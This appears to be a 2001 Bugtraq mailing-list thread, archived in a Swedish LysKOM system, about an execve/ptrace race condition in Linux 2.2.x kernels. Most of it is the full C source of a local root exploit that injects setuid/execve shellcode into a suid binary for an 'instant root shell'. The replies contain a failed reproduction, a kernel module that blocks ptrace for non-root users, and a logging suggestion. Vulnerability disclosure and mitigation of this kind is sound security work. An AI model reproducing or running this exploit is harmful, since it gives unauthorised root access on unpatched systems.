6962348 2001-08-23 18:31 -0400 /29 rader/ Silvio Mazzaro <mazzaro@tiscalinet.it>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-23 20:05 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: mazzaro@inwind.it
Mottagare: Bugtraq (import) <18925>
Ärende: Linux Kernel 2.2.x
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
Hi all!!
The execve/ptrace race condition still appears to work on linux kernel
2.2.19..
Here is the exploit...
Bye,
Silvio
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iQEeBAEUAwAGBQI7hYRJAAoJEHe79juiogw+Pj0D/0rERiZzpxs8DBJVKjTcgewu
+WguYw1xXwye9bCFNZqfmJAepOls+MByzscom6s3JOXfdEUhmVfuFSQAKVBit8ou
zgAhIbYyMyh4mjE0+U6ujHupohtqtYh4nh2URX/+r+nWu9Qhvdv0OKDgGlmOsWJR
0y0zjm1eLhdRNMbNIfRrA/9JfrAy/2YrhwuDg81vjdQauUxETYc7fQuLDSlA4YKZ
ELwsG1TlTYf9ZU6YP06KdLG7YIBzp/eFAJI0KHO1/Lw5dROrQYLZ6uqxgfdcQ/Sx
pTpDw4ds7q1DdeYNPYiHefFtMFHaO5hQMGHNlHfKlfPZ9J+HO6MfI/w6dR9zQOyq
hw==
=v6Hm
-----END PGP SIGNATURE-----
(6962348) /Silvio Mazzaro <mazzaro@tiscalinet.it>/--
Bilaga (text/x-c) i text 6962349
Kommentar i text 6962978 av William D. Colburn (aka Schlake) <wcolburn@nmt.edu>
Kommentar i text 6968917 av Mariusz Woloszyn <emsi@ipartners.pl>
6962349 2001-08-23 18:31 -0400 /193 rader/ Silvio Mazzaro <mazzaro@tiscalinet.it>
Bilagans filnamn: "a2.c"
Importerad: 2001-08-23 20:05 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: mazzaro@inwind.it
Mottagare: Bugtraq (import) <18926>
Bilaga (text/plain) till text 6962348
Ärende: Bilaga (a2.c) till: Linux Kernel 2.2.x
------------------------------------------------------------
/*
* epcs2 (improved by lst [liquid@dqc.org])
* --------
* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
*
* originally by:
* (c) 2001 Wojciech Purczynski / cliph / <wp@elzabsoft.pl>
*
* improved by:
* lst [liquid@dqc.org]
*
* This sploit does _not_ use brute force. It does not need that.
* It does only one attemt to sploit the race condition in execve.
* Parent process waits for a context-switch that occur after
* child task sleep in execve.
*
* It should work even on openwall-patched kernels (I haven't tested it).
*
* Compile it:
* cc epcs.c -o epcs
* Usage:
* ./epcs [victim]
*
* It gives instant root shell with any of a suid binaries.
*
* If it does not work, try use some methods to ensure that execve
* would sleep while loading binary file into memory,
*
* i.e.: cat /usr/lib/* >/dev/null 2>&1
*
* Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
* This exploit does not work on 2.4.x because kernel won't set suid
* privileges if user ptraces a binary.
* But it is still exploitable on these kernels.
*
* Thanks to Bulba (he made me to take a look at this bug ;) )
* Greetings to SigSegv team.
*
* -- d00t
* improved by lst [liquid@dqc.org]
* props to kevin for most of the work
*
* now works on stack non-exec systems with some neat trickery for the automated
* method, ie. no need to find the bss segment via objdump
*
* particularly it now rewrites the code instruction sets in the
* dynamic linker _start segment and continues execution from there.
*
* an aside, due to the fact that the code self-modified, it wouldnt work
* quite correctly on a stack non-exec system without playing directly with
* the bss segment (ie no regs.eip = regs.esp change). this is much more
* automated. however, do note that the previous version did not trigger stack
* non-exec warnings due to how it was operating. note that the regs.eip = regs.esp
* method will break on stack non-exec systems.
*
* as always.. enjoy.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <signal.h>
#include <linux/user.h>
#include <sys/wait.h>
#include <limits.h>
#include <errno.h>
#include <stdlib.h>
#define CS_SIGNAL SIGUSR1
#define VICTIM "/usr/bin/passwd"
#define SHELL "/bin/sh"
/*
* modified simple shell code with some trickery (hand tweaks)
*/
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */
"\x31\xc0\xb0\x2e\xcd\x80"
"\x31\xc0\x50\xeb\x17\x8b\x1c\x24" /* execve(SHELL) */
"\x90\x90\x90\x89\xe1\x8d\x54\x24" /* lets be tricky */
"\x04\xb0\x0b\xcd\x80\x31\xc0\x89"
"\xc3\x40\xcd\x80\xe8\xe4\xff\xff"
"\xff" SHELL "\x00\x00\x00" ; /* pad me */
volatile int cs_detector=0;
void cs_sig_handler(int sig)
{
cs_detector=1;
}
void do_victim(char * filename)
{
while (!cs_detector) ;
kill(getppid(), CS_SIGNAL);
execl(filename, filename, NULL);
perror("execl");
exit(-1);
}
int check_execve(pid_t victim, char * filename)
{
char path[PATH_MAX+1];
char link[PATH_MAX+1];
int res;
snprintf(path, sizeof(path), "/proc/%i/exe", (int)victim);
if (readlink(path, link, sizeof(link)-1)<0) {
perror("readlink");
return -1;
}
link[sizeof(link)-1]='\0';
res=!strcmp(link, filename);
if (res) fprintf(stderr, "child slept outside of execve\n");
return res;
}
int main(int argc, char * argv[])
{
char * filename=VICTIM;
pid_t victim;
int error, i;
struct user_regs_struct regs;
/* take our command args if you wanna play with other progs */
if (argc>1) filename=argv[1];
signal(CS_SIGNAL, cs_sig_handler);
victim=fork();
if (victim<0) {
perror("fork: victim");
exit(-1);
}
if (victim==0) do_victim(filename);
kill(victim, CS_SIGNAL);
while (!cs_detector) ;
if (ptrace(PTRACE_ATTACH, victim)) {
perror("ptrace: PTRACE_ATTACH");
goto exit;
}
if (check_execve(victim, filename))
goto exit;
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_CONT, victim, 0, 0)) {
perror("ptrace: PTRACE_CONT");
goto exit;
}
(void)waitpid(victim, NULL, WUNTRACED);
if (ptrace(PTRACE_GETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_GETREGS");
goto exit;
}
/* make sure that last null is in there */
for (i=0; i<=strlen(shellcode); i+=4) {
if (ptrace(PTRACE_POKETEXT, victim, regs.eip+i,
*(int*)(shellcode+i))) {
perror("ptrace: PTRACE_POKETEXT");
goto exit;
}
}
if (ptrace(PTRACE_SETREGS, victim, 0, ®s)) {
perror("ptrace: PTRACE_SETREGS");
goto exit;
}
fprintf(stderr, "bug exploited successfully.\nenjoy!\n");
if (ptrace(PTRACE_DETACH, victim, 0, 0)) {
perror("ptrace: PTRACE_DETACH");
goto exit;
}
(void)waitpid(victim, NULL, 0);
return 0;
exit:
fprintf(stderr, "d0h! error!\n");
kill(victim, SIGKILL);
return -1;
}
(6962349) /Silvio Mazzaro <mazzaro@tiscalinet.it>/--
6962978 2001-08-23 11:17 -0600 /23 rader/ William D. Colburn (aka Schlake) <wcolburn@nmt.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-23 21:51 av Brevbäraren
Extern mottagare: mazzaro@inwind.it
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18928>
Kommentar till text 6962348 av Silvio Mazzaro <mazzaro@tiscalinet.it>
Ärende: Re: Linux Kernel 2.2.x
------------------------------------------------------------
From: "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu>
To: mazzaro@inwind.it
Cc: bugtraq@securityfocus.com
Message-ID: <20010823111719.A23822@nmt.edu>
I tried a variety of suid executables on a linux 2.2.19 and I was
unable to get a root shell.
On Thu, Aug 23, 2001 at 06:31:30PM -0400, Silvio Mazzaro wrote:
> Hi all!!
>
> The execve/ptrace race condition still appears to work on linux kernel
> 2.2.19..
>
> Here is the exploit...
--
William Colburn, "Sysprog" <wcolburn@nmt.edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
(6962978) /William D. Colburn (aka Schlake) <wcolburn@nmt.edu>/(Ombruten)
6968917 2001-08-24 11:54 +0200 /18 rader/ Mariusz Woloszyn <emsi@ipartners.pl>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-24 18:58 av Brevbäraren
Extern mottagare: mazzaro@inwind.it
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18937>
Kommentar till text 6962348 av Silvio Mazzaro <mazzaro@tiscalinet.it>
Ärende: Re: Linux Kernel 2.2.x
------------------------------------------------------------
On Thu, 23 Aug 2001, Silvio Mazzaro wrote:
> The execve/ptrace race condition still appears to work on linux kernel
> 2.2.19..
>
Again attached module disables ptrace for non root users. Id does not
solve the problem, but prevents exploiting it.
NOTE: there may be another way to exploit this vulnerability!
p.s. gcc -c npt.c; insmod ./npt.o
--
Mariusz Wo³oszyn
Internet Security Specialist, Internet Partners
(6968917) /Mariusz Woloszyn <emsi@ipartners.pl>/----
Bilaga (text/plain) i text 6968918
Kommentar i text 6970279 av Wojtek Kaniewski <wojtekka@bydg.pdi.net>
6970279 2001-08-24 23:07 +0200 /18 rader/ Wojtek Kaniewski <wojtekka@bydg.pdi.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-24 23:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18943>
Kommentar till text 6968917 av Mariusz Woloszyn <emsi@ipartners.pl>
Ärende: Re: Linux Kernel 2.2.x
------------------------------------------------------------
From: Wojtek Kaniewski <wojtekka@bydg.pdi.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108242303180.8653-100000@noghri.bydg.pdi.net>
On Fri, 24 Aug 2001, Mariusz Woloszyn wrote:
> Again attached module disables ptrace for non root users. Id does not
> solve the problem, but prevents exploiting it.
adding something like...
printk("ptrace(): uid=%d, comm=%s\n", current->uid, current->comm);
...before ,,return'' helps spotting potential abusers.
regards,
wojtek
(6970279) /Wojtek Kaniewski <wojtekka@bydg.pdi.net>/
6968918 2001-08-24 11:54 +0200 /50 rader/ Mariusz Woloszyn <emsi@ipartners.pl>
Bilagans filnamn: "npt.c"
Importerad: 2001-08-24 18:58 av Brevbäraren
Extern mottagare: mazzaro@inwind.it
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18938>
Bilaga (text/plain) till text 6968917
Ärende: Bilaga (npt.c) till: Re: Linux Kernel 2.2.x
------------------------------------------------------------
/* no ptrace module
fast prevention for kenrel bug
(c) 2001 a Lam3rZ oddysey
*/
#define MODULE
#define __KERNEL__
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/unistd.h>
#include <sys/syscall.h>
#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) ((a)*65536+(b)*256+(c))
#endif
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,2,0)
#include <asm/unistd.h>
#endif
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,2,14)
#include <bits/syscall.h>
#endif
extern void *sys_call_table[];
int (*orig_ptrace)(int, int, int, int);
int no_ptrace (int request, int pid, int addr, int data) {
if (current->euid ==0 ) {
return (orig_ptrace)(request, pid, addr, data);
} else
return -1;
}
int init_module(void) {
orig_ptrace = sys_call_table[__NR_ptrace];
sys_call_table[__NR_ptrace]=no_ptrace;
return 0;
}
void cleanup_module(void) {
sys_call_table[__NR_ptrace]=orig_ptrace;
}
(6968918) /Mariusz Woloszyn <emsi@ipartners.pl>/----